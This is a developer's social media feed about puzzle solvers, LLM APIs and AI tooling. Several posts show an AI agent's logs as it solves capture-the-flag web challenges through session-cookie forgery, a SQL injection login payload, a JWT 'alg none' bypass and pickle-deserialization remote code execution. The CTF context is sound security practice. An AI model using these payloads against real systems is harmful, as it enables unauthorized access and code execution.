Nimo 🏳️‍🌈
LightNews LightNews
banner
nimobeeren.com
Nimo 🏳️‍🌈
@nimobeeren.com
1.1K followers 280 following 570 posts
Building cool things with or without AI (mostly with) — 🧪🎹💻🌸📷🔧📔

🌐 nimobeeren.com
📍 Eindhoven
Posts Replies Media Videos
nimobeeren.com
I also found some interesting "hidden rules" about the game. Despite being legal, you never _need_ a strand to cross itself or another strand.

Example: the word LIME in this image from the tutorial would never actually appear in a solution, because it requires crossing itself.
A grid of letters with the words BANANA, APPLE and LIME marked in blue. The word LIME creates a crossing strand.
January 11, 2026 at 8:01 PM
nimobeeren.com
We love predictable optimizations. Easy puzzles got a bit slower, hard puzzles got a lot faster 🚀

This was the result of integrating strand crossing checks into the search, rather than post-filtering them.
A table showing puzzle date, old time, new time and change. Puzzles with an old time between 0-2s got a few seconds slower, while the rest got much faster (up to 60%). Full table data: | Puzzle Date | OLD Time | NEW Time | Change | |-------------|----------|----------|--------| | 2025-10-01 | 1.9s | 4.9s | **+3.0s slower** | | 2025-10-02 | 18.1s | 14.5s | **-3.6s faster** | | 2025-10-03 | 34.4s | 26.0s | **-8.4s faster** | | 2025-10-04 | **>90s TIMEOUT** | 56.3s | **🎉 FIXED!** | | 2025-10-05 | 64.4s | 25.8s | **-38.6s faster (60%!)** | | 2025-10-06 | 1.1s | 2.0s | +0.9s slower | | 2025-10-07 | 1.0s | 1.8s | +0.8s slower | | 2025-10-08 | 7.1s | 4.9s | **-2.2s faster** | | 2025-10-09 | >90s | >90s | same (still timeout) | | 2025-10-10 | 0.7s | 3.6s | +2.9s slower |
January 11, 2026 at 5:06 PM
nimobeeren.com
I was messing around with Opus to generate an evals app for voice AI apps. I asked it to generate some mock audio files and it kinda bops 💿
January 8, 2026 at 7:55 PM
nimobeeren.com
Cloud agent goes brrrr
GitHub diff with 7 files changed with 172.843 lines added and 13 lines removed in 1 commit
January 4, 2026 at 7:36 PM
nimobeeren.com
In the category of things I wouldn't have done without AI help: I made a benchmark script for my Strands solver!

Now I know how well it does at solving ~100 real puzzles: github.com/nimobeeren/s...

Pass rate of ~19% means there is work to be done!
benchmark Benchmark the solver against a set of puzzles. Results are saved to a Markdown file. uv run strands-solver benchmark # default: 2025-09-01 to 2025-12-31 uv run strands-solver benchmark -s 2025-10-01 -e 2025-10-31 # custom date range uv run strands-solver benchmark -t 30 # 30 second timeout per puzzle uv run strands-solver benchmark -r ./my_results.md # custom results file
January 3, 2026 at 9:43 PM
nimobeeren.com
Trying to figure out how to map the models named in the system card to the API models.

This seems right, but where is gpt-5-main-mini? Is it just gpt-5-mini with reasoning effort set to minimal?
August 8, 2025 at 9:43 AM
nimobeeren.com
RIP temperature?
JSON object: { "error": { "message": "Unsupported value: 'temperature' does not support 0.7 with this model. Only the default (1) value is supported.", "type": "invalid_request_error", "param": "temperature", "code": "unsupported_value" } }
August 8, 2025 at 7:55 AM
nimobeeren.com
This concept of self-containment explains why LLM responses often feel unnatural to me, especially in a voice context. They try to restate my input rather than just giving an answer like a human would. Surprisingly hard to prompt around!

From "There are Only 6 RAG Evals" jxnl.co/writing/2025...
6. Self-Containment (Q|A) - Definition: Can the original question be inferred from the answer alone? This measures whether the answer provides enough context to stand on its own. This connects to our discussion of monologues and chain-of-thought approaches that make thinking visible. Answers that restate and address the core question directly create better user experiences, especially in asynchronous communication contexts.
July 17, 2025 at 9:49 AM
nimobeeren.com
I made a harder version of my CTF challenge which relies on an RCE exploit by unsafe pickle deserialization. The solution I had in mind was to read a file on the server's disk and send it to a webhook I set up.

I let my simple o4-mini agent have a go, not expecting much. But I was surprised! 👀

1/n
Terminal output saying: 🏁 Flag found: CTF{b0f2a7d6d5413b96d8a631bfee4bb0ea} Summary: 1. Logged in as guest (guest/guest). 2. Noticed session cookie was a base64-encoded pickle. 3. Decoded it to confirm it stored {'username': 'guest'}. 4. Crafted a pickled session for admin by changing username to "admin". 5. Attempted to find an activation endpoint-none existed. 6. Exploited unsafe pickle deserialization for RCE: injected a payload to run cat flag.txt and write it to 'static/flag.txt* 7. Retrieved the flag from the newly created 'static/flag.txt* 🪜 Took 18 steps ⌛ Took 122.23s
July 7, 2025 at 7:03 PM
nimobeeren.com
Vibe coded a couple CTF challenges that I can run locally.

Gemini taught me about Traefik which lets me run multiple apps on subdomains of localhost, didn't know that was possible!
A login form for the Glactic Cookie Club at URL cookie1.localhost/login
June 29, 2025 at 8:24 PM
nimobeeren.com
Looks great! 💜
June 29, 2025 at 10:04 AM
nimobeeren.com
It even did a harder variant with a JWT, setting "alg": "none" in the header to bypass the signature check. This is a real exploit that a lot of apps are vulnerable to!

cloud.langfuse.com/project/cmca...
Terminal output: 🏁 Here’s how I got the flag: 1. Visited the login page and logged in as the guest user (guest/guest), receiving a JWT session cookie signed with HS256. 2. Noticed there’s no direct admin endpoint, but the site uses a JWT with the “alg” header value determining validation. 3. Crafted a new JWT by changing the header to `"alg":"none"` and the payload to `{"username":"admin"}`, then removed the signature. 4. Sent a request to `/` with this modified session cookie. The server accepted the token (no signature check) and treated me as admin. 5. The page returned the flag in a success alert. Flag: CTF{16c835fcf5bc3e46b188f3172db03c6b} 🪜 Took 7 steps ⌛ Took 51.33s
June 26, 2025 at 7:42 PM
nimobeeren.com
I guess I haven't posted about this!

I made a very simple agent that solves Capture-The-Flag (CTF) cybersecurity challenges. It's less than 100 lines of code and it has only one tool: making HTTP requests.

It was able to do several cookie spoofing and SQL injection attacks.

Check out what it did!
Terminal containing the following output: 🌐 { method: 'GET', url: 'https://oceans11.ctf.p0wnparty.nl/', headers: [], body: '' } 🌐 { method: 'POST', url: 'https://oceans11.ctf.p0wnparty.nl/login', headers: [ { name: 'Content-Type', value: 'application/x-www-form-urlencoded' } ], body: 'username=guest&password=guest' } 🌐 { method: 'GET', url: 'https://oceans11.ctf.p0wnparty.nl/', headers: [ { name: 'Cookie', value: 'session=eyJ1c2VybmFtZSI6ICJndWVzdCJ9' } ], body: '' } 🌐 { method: 'GET', url: 'https://oceans11.ctf.p0wnparty.nl/robots.txt', headers: [], body: '' } 🌐 { method: 'GET', url: 'https://oceans11.ctf.p0wnparty.nl/', headers: [ { name: 'Cookie', value: 'session=eyJ1c2VybmFtZSI6ImFkbWluIn0' } ], body: '' } Terminal showing the following output: 🌐 { method: 'GET', url: 'https://oceans11.ctf.p0wnparty.nl/admin', headers: [ { name: 'Cookie', value: 'session=eyJ1c2VybmFtZSI6ICJndWVzdCJ9' } ], body: '' } 🌐 { method: 'POST', url: 'https://oceans11.ctf.p0wnparty.nl/login', headers: [ { name: 'Content-Type', value: 'application/x-www-form-urlencoded' } ], body: 'username=admin&password=admin' } 🌐 { method: 'POST', url: 'https://oceans11.ctf.p0wnparty.nl/login', headers: [ { name: 'Content-Type', value: 'application/x-www-form-urlencoded' } ], body: "username=admin'--&password=ignored" } 🌐 { method: 'GET', url: 'https://oceans11.ctf.p0wnparty.nl/', headers: [ { name: 'Cookie', value: 'session=eyJ1c2VybmFtZSI6ImFkbWluIn0=' } ], body: '' } 🏁 Here’s a concise breakdown of how I retrieved the flag: 1. Inspected the login page and noticed a guest account (guest:guest) but no printing access. 2. Logged in as guest to confirm that keycard printing is disabled for that user. 3. Examined the `session` cookie set after login; it was a Base64‐encoded JSON object, e.g. `eyJ1c2VybmFtZSI6ICJndWVzdCJ9`. 4. Decoded it to `{"username":"guest"}` and realized the application likely trusts this JSON for authorization. 5. Modified the JSON to `{"username":"admin"}`, re‐encoded it (resulting in `eyJ1c2VybmFtZSI6ImFkbWluIn0=`) and set that as the `session` cookie. 6. Reloaded the main page with the forged admin cookie and was shown the hidden admin section containing the flag. Flag: CTF{df9cef93a5c03f25482eb4192de9bd17} 🪜 Took 10 steps ⌛ Took 75.25s
June 26, 2025 at 7:42 PM
nimobeeren.com
the IT person when setting the session expiry to 30 mins and forcing 2fa on every login
June 26, 2025 at 11:17 AM
nimobeeren.com
I confess I don't get font ligatures. I don't mean turning => into ⇒ (fine if you want that I guess). But things like pic attached.

Why did the t get stuck to the i? Where did its extra length come from? Does it hurt when it stretches like that?
June 20, 2025 at 10:24 AM
nimobeeren.com
vid (loading cut out)
May 20, 2025 at 7:36 PM
nimobeeren.com
Made a little nicer UI for uploading clothing items 👖
May 20, 2025 at 7:36 PM
nimobeeren.com
Tried to make a draft PR on our gateway but got stuck on auth. Is there no way to use this with projects not hosted on Vercel? Or can we make a no-op project just for billing and use the token from that?
May 20, 2025 at 7:06 PM
nimobeeren.com
Regular joins with an ON clause also don't work 😕
session.exec( select(db.User).join( db.AvatarImage, db.User.avatar_image_id == db.AvatarImage.id, # type: ignore ) )
April 21, 2025 at 3:44 PM
nimobeeren.com
Today I'm learning that SQLAlchemy and Python type checking don't go so well together. I need a type ignore and a cast to make joinedload work, ouch 😟
# Check if a wearable exists with the given image ID and belongs to the current user wearable = typing.cast( db.Wearable | None, session.exec( select(db.Wearable) .options(joinedload(db.Wearable.wearable_image)) # type: ignore ).one_or_none(), )
April 21, 2025 at 3:41 PM
nimobeeren.com
Interesting announcement when you're just starting a multi-agent project 👀

Don't think I'll be using it immediately since it's not production-ready yet, but I don't mind that we're giving the multi-agent concept a little more shape.

developers.googleblog.com/en/a2a-a-new...
April 10, 2025 at 4:08 PM
nimobeeren.com
Looks like a lot of enterprises gave their stamp of approval. I wonder if any of them will actually make some effective agents. Haven't had much success with Agentforce so far.
Collection of enterprise logos titled "Partners contributing to the Agent2Agent protocol"
April 10, 2025 at 4:02 PM
nimobeeren.com
Just started reading the spec and it sounds like the model can also make the decision of which resources to use.

spec.modelcontextprotocol.io/specificatio...
Implement automatic context inclusion, based on heuristics or the AI model’s selection
April 7, 2025 at 7:27 PM
nimobeeren.com
AIE Summit 2025 was so much fun!

Cheers to all the awesome people I met ✨

Can't wait until the next Summit (I heard Paris? 🥖)
a group of people sitting in an atrium during the AI Engineer Summit 2025 keynote
February 23, 2025 at 11:25 AM
nimobeeren.com
NYC I am in you!!
February 19, 2025 at 12:55 AM